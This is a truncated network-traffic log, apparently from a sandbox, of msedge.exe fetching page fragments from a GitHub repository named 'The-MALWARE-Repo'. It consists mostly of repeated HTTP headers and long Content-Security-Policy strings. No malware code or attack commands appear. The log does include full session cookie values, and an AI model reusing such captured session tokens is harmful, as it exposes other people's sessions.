set-cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
set-cookie: _octo=GH1.1.926262901.1741746904; Path=/; Domain=github.com; Expires=Thu, 12 Mar 2026 02:35:04 GMT; Secure; SameSite=Lax
set-cookie: logged_in=no; Path=/; Domain=github.com; Expires=Thu, 12 Mar 2026 02:35:04 GMT; HttpOnly; Secure; SameSite=Lax
x-github-request-id: 30B4:76FE2:601A7:7C93D:67D0F2D7
GET

https://github.com/Da2dalus/The-MALWARE-Repo/security/overall-count

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/security/overall-count HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:05 GMT
content-type: text/fragment+html; charset=utf-8
content-length: 0
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=14400, private
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
accept-ranges: bytes
x-github-request-id: 30B4:76FE2:60272:7CA35:67D0F2D8
GET

https://github.com/Da2dalus/The-MALWARE-Repo/hovercards/citation/sidebar_partial?tree_name=master

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/hovercards/citation/sidebar_partial?tree_name=master HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light

Response

HTTP/2.0 204

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:05 GMT
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
x-github-request-id: 30B4:76FE2:60272:7CA36:67D0F2D9
GET

https://github.com/Da2dalus/The-MALWARE-Repo/used_by_list

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/used_by_list HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:05 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"adc2c0d060742993a54f31416bc951e3"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 79
x-github-request-id: 30B4:76FE2:60284:7CA53:67D0F2D9
GET

https://github.com/Da2dalus/The-MALWARE-Repo/latest-commit/master

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/latest-commit/master HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:05 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"07da86d5c2d3c431a0aa2221ab777c22"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 1218
x-github-request-id: 30B4:76FE2:60284:7CA55:67D0F2D9
GET

https://github.com/Da2dalus/The-MALWARE-Repo/refs?type=branch

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/refs?type=branch HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: application/json
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:05 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"57dd3ff551f8b3d10b3856a048bab63c"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 53
x-github-request-id: 30B4:76FE2:60284:7CA58:67D0F2D9
GET

https://github.com/Da2dalus/The-MALWARE-Repo/tree-commit-info/master

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/tree-commit-info/master HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:05 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"ced17b2112827c8d5577d524acbe58b5"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com 